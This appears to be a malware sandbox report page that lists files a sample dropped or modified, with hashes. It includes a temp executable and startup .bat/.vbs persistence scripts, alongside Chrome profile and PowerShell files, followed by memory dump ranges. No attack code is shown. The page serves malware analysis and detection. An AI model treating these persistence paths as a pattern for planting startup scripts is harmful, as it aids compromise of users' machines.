d6e686371cb0df40ab9cf986f46befd05a992eab741f49e803ccc4b55417bf9ab8cf06713105f6a804b7171fc4e58065da7482dbfb1322160c6d5d3acfe0b011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
187B

MD5
735649610092311b77fbd3f0584cbcf2

SHA1
c3c784129b45c7d7ae9b6ad9ea75f14a2e4fec48

SHA256
95bd12390eb354139f4e13fd32032600cecdc30b728809e82a8230984950ea70

SHA512
f1c9171fc12de2ea896c4eadd6da72822f6706a57e6f98b85f93d247063a30e66a5d1c468e1b56a633b7f9c690d0361b96056319d42e386c911f6f400e997970

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
44b830640d544bf882662ffd389d36c0

SHA1
e093ad0fbe2d71bc9eafd2a0c44c210dbc136acf

SHA256
c296ddd4f938c939f3036449b0a2dfd8f4fe66b5beadf4460ca6bdffe8f81d79

SHA512
8b9742999f8dc0b1c239799d7ddb82abb0308668dc6360c105dc04e4b1fe207b4d08a71dc656a6d96bcbe6e5ca6b5b5a11d5bb148fe5d5e6ed6b826942a616b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
b39654a4be65cfe64736f776aa845cdb

SHA1
3a225b82e6abc3d5fad06fa842850843614594de

SHA256
39aa824e0d5decd4873e4a20c35ea5ff78b977a8c7461710545bb34a955522c9

SHA512
37a29b6f4801af0eaf406bdb5305dcf43d0f3b56905211bacf78475de0ba2677d0b753efd37d642472bb1159a630ccf49bfecbc58cd54cb8d264cee6a0fa05da

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
0364b9d428fc9f473d3c1aa20fadd53b

SHA1
bd28491ea6514f10bfbc1b4ebf99ba72080ba494

SHA256
b6dd21e359c01c4bebb39ba50c270872b3546a6d6979331a1bb32227e1553fad

SHA512
e81e42f46175016bf012b5993aec0674e459278480cf538a0d8634fbadea6d446446aa398cbd3c23db30f022b038ab83e4123b906b4dcd1bf22ae951b9fc7de1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe583a83.TMP

Filesize
119B

MD5
393157d8894460dc548bddecfb02a26e

SHA1
5b2c92b108ad66c0be15fa757e595a89066847e8

SHA256
05e01dbd2e1bac5ed4812ab3c0c22c2d35ce1090e488455d41d6c00428f42ac1

SHA512
6a5327942c1d19af09caef9aef312c914df7afe4c5f39623d7fb98b52c436c72c439f6c9078fe506466c11187f235043d93d7c4cb65ccb88ff4a344365b986d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
bd363e07af4e602bcb804003df9ab946

SHA1
4b4ff78af3cd2fddcbc708622c3de3f4a8dabd2a

SHA256
1ed4990c3eceadc3048ebb1b0edaae00f5a76810b6f5278ff6217394325ab985

SHA512
3031ce840cdff8d70c0db889c05981fe7db6b6fd38734f0ebdee56a89fc2b869f37e778b30702326110277f13ac67b9bbddbbc2b00151a3c99c788067f12e713

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
12a429f9782bcff446dc1089b68d44ee

SHA1
e41e5a1a4f2950a7f2da8be77ca26a66da7093b9

SHA256
e1d7407b07c40b5436d78db1077a16fbf75d49e32f3cbd01187b5eaaa10f1e37

SHA512
1da99c5278a589972a1d711d694890f4fd4ec4e56f83781ab9dee91ba99530a7f90d969588fa24dce24b094a28bdecbea80328cee862031a8b289f3e4f38ce7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1432_1859988661\Icons Monochrome\16.png

Filesize
216B

MD5
a4fd4f5953721f7f3a5b4bfd58922efe

SHA1
f3abed41d764efbd26bacf84c42bd8098a14c5cb

SHA256
c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3

SHA512
7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1432_340010065\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
7f57c509f12aaae2c269646db7fde6e8

SHA1
969d8c0e3d9140f843f36ccf2974b112ad7afc07

SHA256
1d5c9f67fe93f9fcc1a1b61ebc35bda8f98f1261e5005ae37af71f42aab1d90f

SHA512
3503a0f4939bed9e1fd5e086b17d6de1063220dffdab2d2373aa9582a2454a9d8f18c1be74442f4e597bdba796d2d69220bd9e6be632a15367225b804187ea18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
256KB

MD5
19fcb7db802fa8f1b9dc85b38962c63d

SHA1
f9f60930be8c7bbc7ea3805e863e8ae27ef74dd7

SHA256
ca471421606df330b4e910d0b45b6b6230623627f15a26e2d8a670fd1cedb241

SHA512
1cb7fe9d5ffbd1c683ec84a1888546694f2e62b5438763e0e7a89e7ef1dc99a54a67439ef2a2429f32975c1fc76f21e8d3d95b21dc45aad771c7203d4f0d63cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
256KB

MD5
e9b385fb2cf7d180fd2f333cf3663267

SHA1
9be8ed4db116ee70908cfe31541c562ddf1635be

SHA256
43ba6b6c5bb23056ef64cf3007e7045e5d658b5314b5db201638ecb1961490a7

SHA512
23dd1ae2620ad8b7b47498bf832ba8dcdab8a85d51287b9e6949f1766515333df38935485864197d55c487dc78c8fc3b6bdf9cff41d54eb6e89e053d400483b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
89KB

MD5
49abf3ecf5548583da36fdf3abfa2b69

SHA1
315d7c191587f35fd9703e2ac7a5d648cabebd6d

SHA256
7aec623ea3107cb5722a38d07c6c272ed0800de067a962f5a6409b2d91afa8bd

SHA512
93cedb3365632fbf5f369511710691fd7a6faccdda1773eb7f88508345325f95d367a9d9de2ae7eb8b41c418cde0a0fe20caa6b4fc0c1c4b76f8d30d976f6555

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
92KB

MD5
4d5bd9574b8224c300f0d18518de7624

SHA1
135cbf5a807b4567b9404e7021fb7838c5e9ef4e

SHA256
24226f7f93f23f2c0da3f71078701391492d60c70d71821cdc11d0716068e846

SHA512
979b051678375aa530e6c245fdcb07eb6c74024894645e9cd41f49719b8357d89e22a0525ecadd24f15b03bcec63d9f45bdcf463aaf709382f5e1c521704f5a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587059.TMP

Filesize
88KB

MD5
b680476f9ece6a1e7d17c02ecc6e0007

SHA1
e9cecb55f0edd11bdfc8b2c3c6e89fa98362e688

SHA256
2150283e2ee0479240885e42a26f0ae937b2878f2598505559d37c843d9b2830

SHA512
43ababc3054571b538ea88a2bc5e6b736703da15d39084bd628480a2854ac114c041efc55d85c4aa82a2cd078ca22af5d67c38cec8744243e19dfc8b85e955ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
26403455115fbc3da2573a37cc28744a

SHA1
6a9bf407036a8b9d36313462c0257f53b4ee9170

SHA256
222a7adb94c5e82df6466a4afce283e905c69f7feb18b3e34583b5cbbd88b352

SHA512
be96d478e5d804b8daf805ad28d5eba644fb63a59a799273e029c8047a036f8aac74098efcadee0e4f405dcd1c0a689a1e8eb23f51a93634ed44f5a7c821beb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
47605a4dda32c9dff09a9ca441417339

SHA1
4f68c895c35b0dc36257fc8251e70b968c560b62

SHA256
e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

SHA512
b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0xbhuvor.wln.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe

Filesize
131KB

MD5
bd65d387482def1fe00b50406f731763

SHA1
d06a2ba2e29228f443f97d1dd3a8da5dd7df5903

SHA256
1ab7375550516d7445c47fd9b551ed864f227401a14ff3f1ff0d70caca3bd997

SHA512
351ecd109c4d49bc822e8ade73a9516c4a531ebcda63546c155e677dcff19708068dc588b2fcf30cad086238e8b206fc5f349d37dda02d3c3a8d9b570d92e4d9

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_178.bat

Filesize
289KB

MD5
15a31e6b43cde7114b2205ce0a38123a

SHA1
1fccd0820d54edb0e8d0f532e8ffd1c024f234d4

SHA256
4570f682c283ce929e8e43642522440b9b874ea605cb2e14b53ec4296631e090

SHA512
af8b38caa5c62b83f8060af340a27b3c2285f5e8d21cc6868c5289575bd4e5b6c1ff9aed888293d1cbf87011ba82d2a5ced0ff27b3c296cdabcc4b333e9453e5

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_178.vbs

Filesize
115B

MD5
4f21d92a0fa6142937ac60df057a5271

SHA1
54b1062b3ee70e88d260ef36dcc9b2b33d1fe14d

SHA256
6efe35f0d08a5aad3830faed627a73f79c9f5cd05efa6c490032ac20c0deeb14

SHA512
013f6d15ce747bd1d0e7b8476b392259fc765ec761df883e43cff4e8da700b2235f2b408d308b5b1cb1194ef657592e32bbf7d821113f131abc91653767f41f6

Download Submit
memory/1988-2557-0x00007FFCF4CAC000-0x00007FFCF4CAE000-memory.dmp

Filesize
8KB

Download
memory/3980-45-0x00007FFCD9260000-0x00007FFCD9D21000-memory.dmp

Filesize
10.8MB

Download
memory/3980-13-0x00000205AA4E0000-0x00000205AA518000-memory.dmp

Filesize
224KB

Download
memory/3980-12-0x00000205AA4D0000-0x00000205AA4D8000-memory.dmp

Filesize
32KB

Download
memory/3980-11-0x000002058E270000-0x000002058E280000-memory.dmp

Filesize
64KB

Download
memory/3980-10-0x00007FFCD9260000-0x00007FFCD9D21000-memory.dmp

Filesize
10.8MB

Download
memory/3980-1-0x00000205AA260000-0x00000205AA282000-memory.dmp

Filesize
136KB

Download
memory/4320-44-0x0000024ABA4E0000-0x0000024ABA4F6000-memory.dmp

Filesize
88KB

Download
memory/4320-1825-0x0000024A9FEC0000-0x0000024A9FECC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads